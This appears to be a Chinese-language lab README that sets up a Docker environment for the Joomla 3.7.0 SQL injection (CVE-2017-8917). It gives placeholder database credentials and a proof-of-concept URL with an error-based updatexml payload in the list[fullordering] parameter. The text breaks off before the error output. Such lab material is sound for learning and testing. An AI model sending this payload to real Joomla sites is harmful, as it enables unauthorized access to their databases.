Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

测试环境

编译及启动测试环境：

docker-compose build
docker-compose up -d

启动后访问http://your-ip即可看到Joomla的安装界面，当前环境的数据库信息为：

• 数据库地址：mysql:3306
• 用户：root
• 密码：root
• 数据库名：joomla

填入上述信息，正常安装即可。

POC测试

安装完成后，访问http://your-ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)，即可看到报错信息：